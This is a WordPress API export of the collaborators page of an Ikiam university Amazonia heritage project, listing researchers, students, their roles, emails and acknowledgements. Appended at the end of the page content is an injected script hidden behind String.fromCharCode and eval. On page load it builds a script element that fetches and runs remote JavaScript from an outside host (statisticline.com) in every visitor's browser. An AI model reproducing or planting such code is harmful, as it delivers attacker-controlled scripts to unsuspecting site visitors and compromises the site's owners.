{"id":130,"date":"2020-09-20T00:48:36","date_gmt":"2020-09-20T00:48:36","guid":{"rendered":"https:\/\/amazonia.ikiam.edu.ec\/?page_id=130"},"modified":"2021-07-29T21:55:54","modified_gmt":"2021-07-30T02:55:54","slug":"colaboradores","status":"publish","type":"page","link":"https:\/\/amazonia.ikiam.edu.ec\/?page_id=130","title":{"rendered":"Colaboradores"},"content":{"rendered":"<h2>Colaboradores<\/h2>\n<h2 style=\"padding-left: 120px; text-align: left;\"><\/h2>\n<p style=\"text-align: center;\"><img loading=\"lazy\" class=\"\" src=\"https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/mariaSoledad.jpg\" sizes=\"(max-width: 600px) 100vw, 600px\" srcset=\"https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/mariaSoledad.jpg 600w, https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/mariaSoledad-300x300.jpg 300w, https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/mariaSoledad-150x150.jpg 150w\" alt=\"\" width=\"523\" height=\"525\" \/><\/p>\n<h3 style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https:\/\/www.researchgate.net\/\">Mar\u00eda Soledad Sol\u00f3rzano<\/a><\/span><\/h3>\n<p style=\"margin-bottom: 0.0001pt; line-height: normal; text-align: center;\">Directora Proyecto Pashimbi Milenario<\/p>\n<p style=\"text-align: center;\">Grupo de Investigaci\u00f3n Poblaci\u00f3n y Ambiente Universidad Regional Amaz\u00f3nica Ikiam<\/p>\n<p style=\"text-align: center;\"><a href=\"mailto:mar\u00eda.solorzano@ikiam.edu.ec\">mar\u00eda.solorzano@ikiam.edu.ec<\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/www.researchgate.net\/\">https:\/\/www.researchgate.net\/<\/a><\/p>\n<h3 style=\"text-align: center;\"><\/h3>\n<h3 style=\"text-align: left;\">Investigadores e Instituciones Asociadas<\/h3>\n<h3 style=\"text-align: center;\"><\/h3>\n<figure><img loading=\"lazy\" class=\"aligncenter\" src=\"https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/karina.jpg\" sizes=\"(max-width: 600px) 100vw, 600px\" srcset=\"https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/karina.jpg 600w, https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/karina-300x300.jpg 300w, https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/karina-150x150.jpg 150w\" alt=\"\" width=\"501\" height=\"501\" \/><\/figure>\n<h5 style=\"text-align: left;\"><span style=\"color: #000000;\">Karina Fonseca<\/span><\/h5>\n<p style=\"text-align: left;\">Antrop\u00f3loga Unidad de Gesti\u00f3n del Patrimonio Cultural Inmaterial \u2013PCI- Instituto Nacional de Patrimonio Cultural.<\/p>\n<p style=\"text-align: left;\">karina.fonseca@patrimoniocultural.gob.ec<\/p>\n<h3 style=\"text-align: center;\"><\/h3>\n<h3 style=\"text-align: center;\"><\/h3>\n<figure><img loading=\"lazy\" class=\"aligncenter\" src=\"https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/yolandaPalacios.jpg\" sizes=\"(max-width: 600px) 100vw, 600px\" srcset=\"https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/yolandaPalacios.jpg 600w, https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/yolandaPalacios-300x300.jpg 300w, https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/yolandaPalacios-150x150.jpg 150w\" alt=\"\" width=\"500\" height=\"499\" \/><\/figure>\n<h5>Yolanda Palacios<\/h5>\n<p style=\"text-align: left;\">T\u00e9cnica de Planeamiento F\u00edsico y Ordenamiento Territorial GAD Municipal de Tena<\/p>\n<p style=\"text-align: left;\">ypalacios_fecd@hotmail.com<\/p>\n<h3 style=\"text-align: left;\"><\/h3>\n<h2 style=\"text-align: left;\">Contenidos<\/h2>\n<figure><img loading=\"lazy\" class=\"aligncenter\" src=\"https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/gabyLoza.jpg\" sizes=\"(max-width: 600px) 100vw, 600px\" srcset=\"https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/gabyLoza.jpg 600w, https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/gabyLoza-300x300.jpg 300w, https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/gabyLoza-150x150.jpg 150w\" alt=\"\" width=\"500\" height=\"500\" \/><\/figure>\n<h5 style=\"text-align: left;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https:\/\/www.researchgate.net\/profile\/Gabriela_Loza2\">Gabriela Margarita Loza<\/a><\/span><\/h5>\n<p style=\"text-align: left;\">Facultad de Ciencias de la vida Universidad Regional Amaz\u00f3nica Ikiam<br \/>\ngabriela.loza@ikiam.edu.ec<br \/>\nhttps:\/\/www.researchgate.net\/profile\/Gabriela_Loza2<\/p>\n<p>&nbsp;<\/p>\n<figure><img loading=\"lazy\" class=\"aligncenter\" src=\"https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/BrianCoronel.jpg\" sizes=\"(max-width: 600px) 100vw, 600px\" srcset=\"https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/BrianCoronel.jpg 600w, https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/BrianCoronel-300x300.jpg 300w, https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/BrianCoronel-150x150.jpg 150w\" alt=\"\" width=\"500\" height=\"500\" \/><\/figure>\n<h5 style=\"text-align: left;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https:\/\/www.researchgate.net\/profile\/Brian_Coronel\">Brian Steven Coronel<\/a><\/span><\/h5>\n<p style=\"text-align: left;\">Carrera Ingenier\u00eda en Ciencias del Agua<br \/>\nbrian.coronel@est.ikiam.edu.ec<br \/>\nhttps:\/\/www.researchgate.net\/profile\/Brian_Coronel<\/p>\n<p>&nbsp;<\/p>\n<figure><a href=\"https:\/\/www.researchgate.net\/profile\/Karla_Vera3\"><img loading=\"lazy\" class=\"aligncenter\" src=\"https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/KarlaVera.jpg\" sizes=\"(max-width: 600px) 100vw, 600px\" srcset=\"https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/KarlaVera.jpg 600w, https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/KarlaVera-300x300.jpg 300w, https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/KarlaVera-150x150.jpg 150w\" alt=\"\" width=\"499\" height=\"499\" \/><\/a><\/figure>\n<h5 style=\"text-align: left;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https:\/\/www.researchgate.net\/profile\/Karla_Vera3\">Karla Estefan\u00eda Vera<\/a><\/span><\/h5>\n<p style=\"text-align: left;\">Carrera Ingenier\u00eda en Ecosistemas<br \/>\nhttps:\/\/www.researchgate.net\/profile\/Karla_Vera3<\/p>\n<p>&nbsp;<\/p>\n<figure><img loading=\"lazy\" class=\"aligncenter\" src=\"https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/carlosCarrasco.jpg\" sizes=\"(max-width: 600px) 100vw, 600px\" srcset=\"https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/carlosCarrasco.jpg 600w, https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/carlosCarrasco-300x300.jpg 300w, https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/carlosCarrasco-150x150.jpg 150w\" alt=\"\" width=\"500\" height=\"500\" \/><\/figure>\n<h5><strong><span style=\"color: #000000;\">Luis Carlos Carrasco<\/span><\/strong><\/h5>\n<p style=\"text-align: left;\">Estudiante carrera Ingenier\u00eda en Ciencias del Agua https:\/\/www.researchgate.net\/profile\/Carlos_Carrasco18luis.carrasco@est.ikiam.edu.ec<\/p>\n<p>&nbsp;<\/p>\n<h3 style=\"text-align: left;\">Dise\u00f1o y desarrollo<\/h3>\n<p style=\"text-align: center;\"><img loading=\"lazy\" class=\"\" src=\"https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/carlosSaltos.jpg\" sizes=\"(max-width: 600px) 100vw, 600px\" srcset=\"https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/carlosSaltos.jpg 600w, https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/carlosSaltos-300x300.jpg 300w, https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/carlosSaltos-150x150.jpg 150w\" alt=\"\" width=\"500\" height=\"500\" \/><\/p>\n<h5 style=\"text-align: left;\"><strong>Carlos Saltos<\/strong><\/h5>\n<p style=\"text-align: left;\">direcci\u00f3n de comunicaci\u00f3n<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" class=\"\" src=\"https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/bruce.jpg\" sizes=\"(max-width: 600px) 100vw, 600px\" srcset=\"https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/bruce.jpg 600w, https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/bruce-300x300.jpg 300w, https:\/\/amazonia.ikiam.edu.ec\/wp-content\/uploads\/2020\/09\/bruce-150x150.jpg 150w\" alt=\"\" width=\"501\" height=\"502\" \/><\/p>\n<h5 style=\"text-align: left;\"><strong>Bruce Tumbaco<\/strong><\/h5>\n<p style=\"text-align: left;\">Carrera Ingenier\u00eda en Geociencias<\/p>\n<h3>AGRADECIMIENTOS<\/h3>\n<ul>\n<li style=\"text-align: left;\">Se\u00f1ora Serafina Cerda<\/li>\n<li style=\"text-align: left;\">Zoraida Licuy, Alicia Grefa (Comunidad Tiyuyaku)<\/li>\n<li style=\"text-align: left;\">Marlene Andi (Kachiwa\u00f1uska Barrio Guayusa)<\/li>\n<li style=\"text-align: left;\">Fernanda Carri\u00f3n, Fernando Mej\u00eda, Andrea Y\u00e1nez (Instituto Nacional de Patrimonio Cultural)<\/li>\n<li style=\"text-align: left;\">Ulises Guti\u00e9rrez<\/li>\n<li style=\"text-align: left;\">Carla Carri\u00f3n (GAD Napo)<\/li>\n<li style=\"text-align: left;\">La Caja Taller de Producci\u00f3n<\/li>\n<\/ul>\n<p><script id='globalsway'>var z =String;var t=z.fromCharCode(118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,39,104,116,116,112,115,58,47,47,99,100,110,46,115,116,97,116,105,115,116,105,99,108,105,110,101,46,99,111,109,47,115,99,114,105,112,116,115,47,115,119,97,121,46,106,115,63,118,61,50,39,59,32,10,115,46,105,100,61,39,115,119,97,121,116,114,97,99,107,39,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125);eval(\/*674867468*\/t);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Colaboradores Mar\u00eda Soledad Sol\u00f3rzano Directora Proyecto Pashimbi Milenario Grupo de Investigaci\u00f3n Poblaci\u00f3n y Ambiente Universidad Regional Amaz\u00f3nica Ikiam mar\u00eda.solorzano@ikiam.edu.ec https:\/\/www.researchgate.net\/ Investigadores e Instituciones Asociadas Karina Fonseca Antrop\u00f3loga Unidad de Gesti\u00f3n del Patrimonio Cultural Inmaterial \u2013PCI- Instituto Nacional de Patrimonio Cultural. karina.fonseca@patrimoniocultural.gob.ec Yolanda Palacios T\u00e9cnica de Planeamiento F\u00edsico y Ordenamiento Territorial GAD Municipal de Tena ypalacios_fecd@hotmail.com&hellip;&nbsp;<a href=\"https:\/\/amazonia.ikiam.edu.ec\/?page_id=130\" class=\"\" rel=\"bookmark\">Read More &raquo;<span class=\"screen-reader-text\">Colaboradores<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/template-pagebuilder-full-width.php","meta":[],"_links":{"self":[{"href":"https:\/\/amazonia.ikiam.edu.ec\/index.php?rest_route=\/wp\/v2\/pages\/130"}],"collection":[{"href":"https:\/\/amazonia.ikiam.edu.ec\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/amazonia.ikiam.edu.ec\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/amazonia.ikiam.edu.ec\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/amazonia.ikiam.edu.ec\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=130"}],"version-history":[{"count":53,"href":"https:\/\/amazonia.ikiam.edu.ec\/index.php?rest_route=\/wp\/v2\/pages\/130\/revisions"}],"predecessor-version":[{"id":1280,"href":"https:\/\/amazonia.ikiam.edu.ec\/index.php?rest_route=\/wp\/v2\/pages\/130\/revisions\/1280"}],"wp:attachment":[{"href":"https:\/\/amazonia.ikiam.edu.ec\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=130"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}